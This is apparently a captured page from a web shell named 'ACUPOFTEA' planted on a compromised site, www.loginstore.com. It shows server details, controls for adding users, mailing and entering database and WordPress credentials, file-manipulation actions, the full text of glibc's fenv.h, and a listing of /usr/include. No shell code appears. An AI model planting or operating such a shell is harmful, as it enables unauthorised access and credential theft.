System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
200.10.71.112
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
fenv.h
/* Copyright (C) 1997-2022 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <https://www.gnu.org/licenses/>. */ /* * ISO C99 7.6: Floating-point environment <fenv.h> */ #ifndef _FENV_H #define _FENV_H 1 #define __GLIBC_INTERNAL_STARTING_HEADER_IMPLEMENTATION #include <bits/libc-header-start.h> /* Get the architecture dependend definitions. The following definitions are expected to be done: fenv_t type for object representing an entire floating-point environment FE_DFL_ENV macro of type pointer to fenv_t to be used as the argument to functions taking an argument of type fenv_t; in this case the default environment will be used fexcept_t type for object representing the floating-point exception flags including status associated with the flags femode_t type for object representing floating-point control modes FE_DFL_MODE macro of type pointer to const femode_t to be used as the argument to fesetmode; in this case the default control modes will be used The following macros are defined iff the implementation supports this kind of exception. FE_INEXACT inexact result FE_DIVBYZERO division by zero FE_UNDERFLOW result not representable due to underflow FE_OVERFLOW result not representable due to overflow FE_INVALID invalid operation FE_ALL_EXCEPT bitwise OR of all supported exceptions The next macros are defined iff the appropriate rounding mode is supported by the implementation. FE_TONEAREST round to nearest FE_UPWARD round toward +Inf FE_DOWNWARD round toward -Inf FE_TOWARDZERO round toward 0 */ #include <bits/fenv.h> __BEGIN_DECLS /* Floating-point exception handling. */ /* Clear the supported exceptions represented by EXCEPTS. */ extern int feclearexcept (int __excepts) __THROW; /* Store implementation-defined representation of the exception flags indicated by EXCEPTS in the object pointed to by FLAGP. */ extern int fegetexceptflag (fexcept_t *__flagp, int __excepts) __THROW; /* Raise the supported exceptions represented by EXCEPTS. */ extern int feraiseexcept (int __excepts) __THROW; #if __GLIBC_USE (IEC_60559_BFP_EXT_C2X) /* Set the supported exception flags represented by EXCEPTS, without causing enabled traps to be taken. */ extern int fesetexcept (int __excepts) __THROW; #endif /* Set complete status for exceptions indicated by EXCEPTS according to the representation in the object pointed to by FLAGP. */ extern int fesetexceptflag (const fexcept_t *__flagp, int __excepts) __THROW; /* Determine which of subset of the exceptions specified by EXCEPTS are currently set. */ extern int fetestexcept (int __excepts) __THROW; #if __GLIBC_USE (IEC_60559_BFP_EXT_C2X) /* Determine which of subset of the exceptions specified by EXCEPTS are set in *FLAGP. */ extern int fetestexceptflag (const fexcept_t *__flagp, int __excepts) __THROW; #endif /* Rounding control. */ /* Get current rounding direction. */ extern int fegetround (void) __THROW __attribute_pure__; /* Establish the rounding direction represented by ROUND. */ extern int fesetround (int __rounding_direction) __THROW; /* Floating-point environment. */ /* Store the current floating-point environment in the object pointed to by ENVP. */ extern int fegetenv (fenv_t *__envp) __THROW; /* Save the current environment in the object pointed to by ENVP, clear exception flags and install a non-stop mode (if available) for all exceptions. */ extern int feholdexcept (fenv_t *__envp) __THROW; /* Establish the floating-point environment represented by the object pointed to by ENVP. */ extern int fesetenv (const fenv_t *__envp) __THROW; /* Save current exceptions in temporary storage, install environment represented by object pointed to by ENVP and raise exceptions according to saved exceptions. */ extern int feupdateenv (const fenv_t *__envp) __THROW; /* Control modes. */ #if __GLIBC_USE (IEC_60559_BFP_EXT_C2X) /* Store the current floating-point control modes in the object pointed to by MODEP. */ extern int fegetmode (femode_t *__modep) __THROW; /* Establish the floating-point control modes represented by the object pointed to by MODEP. */ extern int fesetmode (const femode_t *__modep) __THROW; #endif /* NaN support. */ #if (__GLIBC_USE (IEC_60559_BFP_EXT_C2X) \ && defined FE_INVALID \ && defined __SUPPORT_SNAN__) # define FE_SNANS_ALWAYS_SIGNAL 1 #endif #ifdef __USE_GNU /* Enable individual exceptions. Will not enable more exceptions than EXCEPTS specifies. Returns the previous enabled exceptions if all exceptions are successfully set, otherwise returns -1. */ extern int feenableexcept (int __excepts) __THROW; /* Disable individual exceptions. Will not disable more exceptions than EXCEPTS specifies. Returns the previous enabled exceptions if all exceptions are successfully disabled, otherwise returns -1. */ extern int fedisableexcept (int __excepts) __THROW; /* Return enabled exceptions. */ extern int fegetexcept (void) __THROW; #endif __END_DECLS #endif /* fenv.h */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
..
DIR
-
drwxr-xr-x
2024-02-16 06:37:05
arpa
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
asm-generic
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
c++
DIR
-
drwxr-xr-x
2024-11-27 09:06:33
drm
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
finclude
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
iproute2
DIR
-
drwxr-xr-x
2026-07-02 06:05:49
libdmmp
DIR
-
drwxr-xr-x
2024-02-16 06:53:04
linux
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
misc
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
mtd
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
net
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netash
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netatalk
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netax25
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
neteconet
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netinet
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netipx
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netiucv
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netpacket
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netrom
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netrose
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
nfs
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
node
DIR
-
drwxr-xr-x
2025-04-08 05:12:47
protocols
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
rdma
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
rpc
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
rpcsvc
DIR
-
drwxr-xr-x
2024-11-27 09:06:31
scsi
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
sound
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
tirpc
DIR
-
drwxr-xr-x
2024-11-27 09:06:30
video
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
x86_64-linux-gnu
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
xen
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
xfs
DIR
-
drwxr-xr-x
2022-02-09 04:42:33
aio.h
text/x-c
7.56 KB
-rw-r--r--
2026-07-24 12:11:17
aliases.h
text/x-c
1.98 KB
-rw-r--r--
2026-07-24 12:11:17
alloca.h
text/x-c
1.17 KB
-rw-r--r--
2026-07-24 12:11:17
ar.h
text/x-c
1.69 KB
-rw-r--r--
2026-07-24 12:11:17
argp.h
text/x-c
24.95 KB
-rw-r--r--
2026-07-24 12:11:17
argz.h
text/x-c
5.91 KB
-rw-r--r--
2026-07-24 12:11:17
assert.h
text/x-c
4.53 KB
-rw-r--r--
2026-07-24 12:11:17
byteswap.h
text/x-c
1.42 KB
-rw-r--r--
2026-07-24 12:11:17
complex.h
text/x-c
7.95 KB
-rw-r--r--
2026-07-24 12:11:17
cpio.h
text/x-c
2.21 KB
-rw-r--r--
2026-07-24 12:11:17
crypt.h
text/x-c
10.87 KB
-rw-r--r--
2021-12-17 10:48:21
ctype.h
text/x-c
10.71 KB
-rw-r--r--
2026-07-24 12:11:17
dirent.h
text/x-c
12.22 KB
-rw-r--r--
2026-07-24 12:11:17
dlfcn.h
text/x-c
8.17 KB
-rw-r--r--
2026-07-24 12:11:17
elf.h
text/x-c
179.98 KB
-rw-r--r--
2026-07-24 12:11:17
endian.h
text/x-c
2.25 KB
-rw-r--r--
2026-07-24 12:11:17
envz.h
text/x-c
2.8 KB
-rw-r--r--
2026-07-24 12:11:17
err.h
text/x-c
2.29 KB
-rw-r--r--
2026-07-24 12:11:17
errno.h
text/x-c
1.64 KB
-rw-r--r--
2026-07-24 12:11:17
error.h
text/x-c
2.36 KB
-rw-r--r--
2026-07-24 12:11:17
execinfo.h
text/x-c
1.49 KB
-rw-r--r--
2026-07-24 12:11:17
fcntl.h
text/x-c
9.89 KB
-rw-r--r--
2026-07-24 12:11:17
features-time64.h
text/x-c
1.38 KB
-rw-r--r--
2026-07-24 12:11:17
features.h
text/x-c
17.44 KB
-rw-r--r--
2026-07-24 12:11:17
fenv.h
text/x-c
5.65 KB
-rw-r--r--
2026-07-24 12:11:17
fmtmsg.h
text/x-c
3.16 KB
-rw-r--r--
2026-07-24 12:11:17
fnmatch.h
text/x-c
2.24 KB
-rw-r--r--
2026-07-24 12:11:17
fstab.h
text/x-c
3.04 KB
-rw-r--r--
2026-07-24 12:11:17
fts.h
text/x-c
9.35 KB
-rw-r--r--
2026-07-24 12:11:17
ftw.h
text/x-c
6.19 KB
-rw-r--r--
2026-07-24 12:11:17
gawkapi.h
text/x-c
39.69 KB
-rw-r--r--
2026-07-20 10:38:47
gconv.h
text/x-c
4.11 KB
-rw-r--r--
2026-07-24 12:11:17
getopt.h
text/x-c
1.43 KB
-rw-r--r--
2026-07-24 12:11:17
glob.h
text/x-c
7.13 KB
-rw-r--r--
2026-07-24 12:11:17
gnu-versions.h
text/x-c
2.29 KB
-rw-r--r--
2026-07-24 12:11:17
gnumake.h
text/x-c
2.84 KB
-rw-r--r--
2022-02-15 03:32:21
grp.h
text/x-c
6.53 KB
-rw-r--r--
2026-07-24 12:11:17
gshadow.h
text/x-c
4.42 KB
-rw-r--r--
2026-07-24 12:11:17
iconv.h
text/x-c
1.81 KB
-rw-r--r--
2026-07-24 12:11:17
ifaddrs.h
text/x-c
2.77 KB
-rw-r--r--
2026-07-24 12:11:17
inttypes.h
text/x-c
8.14 KB
-rw-r--r--
2026-07-24 12:11:17
langinfo.h
text/x-c
17.43 KB
-rw-r--r--
2026-07-24 12:11:17
lastlog.h
text/x-c
126 B
-rw-r--r--
2026-07-24 12:11:17
libgen.h
text/x-c
1.35 KB
-rw-r--r--
2026-07-24 12:11:17
libintl.h
text/x-c
4.47 KB
-rw-r--r--
2026-07-24 12:11:17
limits.h
text/x-c
5.57 KB
-rw-r--r--
2026-07-24 12:11:17
link.h
text/x-c
7.62 KB
-rw-r--r--
2026-07-24 12:11:17
locale.h
text/x-c
7.5 KB
-rw-r--r--
2026-07-24 12:11:17
malloc.h
text/x-c
5.84 KB
-rw-r--r--
2026-07-24 12:11:17
math.h
text/x-c
48.7 KB
-rw-r--r--
2026-07-24 12:11:17
mcheck.h
text/x-c
2.38 KB
-rw-r--r--
2026-07-24 12:11:17
memory.h
text/x-c
956 B
-rw-r--r--
2026-07-24 12:11:17
mntent.h
text/x-c
3.28 KB
-rw-r--r--
2026-07-24 12:11:17
monetary.h
text/x-c
1.92 KB
-rw-r--r--
2026-07-24 12:11:17
mpath_cmd.h
text/x-c
4.06 KB
-rw-r--r--
2023-10-31 10:21:59
mpath_persist.h
text/x-c
11.22 KB
-rw-r--r--
2023-10-31 10:21:59
mqueue.h
text/x-c
4.5 KB
-rw-r--r--
2026-07-24 12:11:17
netdb.h
text/x-c
27.79 KB
-rw-r--r--
2026-07-24 12:11:17
nl_types.h
text/x-c
1.71 KB
-rw-r--r--
2026-07-24 12:11:17
nss.h
text/x-c
14.07 KB
-rw-r--r--
2026-07-24 12:11:17
obstack.h
text/x-c
20.81 KB
-rw-r--r--
2026-07-24 12:11:17
paths.h
text/x-c
2.91 KB
-rw-r--r--
2026-07-24 12:11:17
poll.h
text/x-c
22 B
-rw-r--r--
2026-07-24 12:11:17
printf.h
text/x-c
6.71 KB
-rw-r--r--
2026-07-24 12:11:17
proc_service.h
text/x-c
3.4 KB
-rw-r--r--
2026-07-24 12:11:17
pthread.h
text/x-c
47.24 KB
-rw-r--r--
2026-07-24 12:11:17
pty.h
text/x-c
1.53 KB
-rw-r--r--
2026-07-24 12:11:17
pwd.h
text/x-c
6.17 KB
-rw-r--r--
2026-07-24 12:11:17
re_comp.h
text/x-c
963 B
-rw-r--r--
2026-07-24 12:11:17
regex.h
text/x-c
25.3 KB
-rw-r--r--
2026-07-24 12:11:17
regexp.h
text/x-c
1.35 KB
-rw-r--r--
2026-07-24 12:11:17
resolv.h
text/x-c
11.96 KB
-rw-r--r--
2026-07-24 12:11:17
sched.h
text/x-c
4.92 KB
-rw-r--r--
2026-07-24 12:11:17
search.h
text/x-c
5.32 KB
-rw-r--r--
2026-07-24 12:11:17
semaphore.h
text/x-c
3.38 KB
-rw-r--r--
2026-07-24 12:11:17
setjmp.h
text/x-c
3.12 KB
-rw-r--r--
2026-07-24 12:11:17
sgtty.h
text/x-c
1.31 KB
-rw-r--r--
2026-07-24 12:11:17
shadow.h
text/x-c
5.34 KB
-rw-r--r--
2026-07-24 12:11:17
signal.h
text/x-c
12.73 KB
-rw-r--r--
2026-07-24 12:11:17
spawn.h
text/x-c
8.08 KB
-rw-r--r--
2026-07-24 12:11:17
stab.h
text/x-c
264 B
-rw-r--r--
2026-07-24 12:11:17
stdc-predef.h
text/x-c
2.4 KB
-rw-r--r--
2026-07-24 12:11:17
stdint.h
text/x-c
8.28 KB
-rw-r--r--
2026-07-24 12:11:17
stdio.h
text/x-c
30.45 KB
-rw-r--r--
2026-07-24 12:11:17
stdio_ext.h
text/x-c
2.73 KB
-rw-r--r--
2026-07-24 12:11:17
stdlib.h
text/x-c
35.54 KB
-rw-r--r--
2026-07-24 12:11:17
string.h
text/x-c
19 KB
-rw-r--r--
2026-07-24 12:11:17
strings.h
text/x-c
4.64 KB
-rw-r--r--
2026-07-24 12:11:17
sudo_plugin.h
text/x-c
11.64 KB
-rw-r--r--
2026-03-02 01:08:06
syscall.h
text/x-c
25 B
-rw-r--r--
2026-07-24 12:11:17
sysexits.h
text/x-c
5.11 KB
-rw-r--r--
2026-07-24 12:11:17
syslog.h
text/x-c
24 B
-rw-r--r--
2026-07-24 12:11:17
tar.h
text/x-c
3.66 KB
-rw-r--r--
2026-07-24 12:11:17
termio.h
text/x-c
214 B
-rw-r--r--
2026-07-24 12:11:17
termios.h
text/x-c
3.51 KB
-rw-r--r--
2026-07-24 12:11:17
tgmath.h
text/x-c
43.61 KB
-rw-r--r--
2026-07-24 12:11:17
thread_db.h
text/x-c
15.65 KB
-rw-r--r--
2026-07-24 12:11:17
threads.h
text/x-c
7.51 KB
-rw-r--r--
2026-07-24 12:11:17
time.h
text/x-c
14.49 KB
-rw-r--r--
2026-07-24 12:11:17
ttyent.h
text/x-c
2.44 KB
-rw-r--r--
2026-07-24 12:11:17
uchar.h
text/x-c
1.96 KB
-rw-r--r--
2026-07-24 12:11:17
ucontext.h
text/x-c
1.99 KB
-rw-r--r--
2026-07-24 12:11:17
ulimit.h
text/x-c
1.55 KB
-rw-r--r--
2026-07-24 12:11:17
unistd.h
text/x-c
43.91 KB
-rw-r--r--
2026-07-24 12:11:17
utime.h
text/x-c
1.86 KB
-rw-r--r--
2026-07-24 12:11:17
utmp.h
text/x-c
3.15 KB
-rw-r--r--
2026-07-24 12:11:17
utmpx.h
text/x-c
4 KB
-rw-r--r--
2026-07-24 12:11:17
values.h
text/x-c
1.91 KB
-rw-r--r--
2026-07-24 12:11:17
wait.h
text/x-c
22 B
-rw-r--r--
2026-07-24 12:11:17
wchar.h
text/x-c
31.05 KB
-rw-r--r--
2026-07-24 12:11:17
wctype.h
text/x-c
5.42 KB
-rw-r--r--
2026-07-24 12:11:17
wordexp.h
text/x-c
2.44 KB
-rw-r--r--
2026-07-24 12:11:17
~ ACUPOFTEA - www.loginstore.com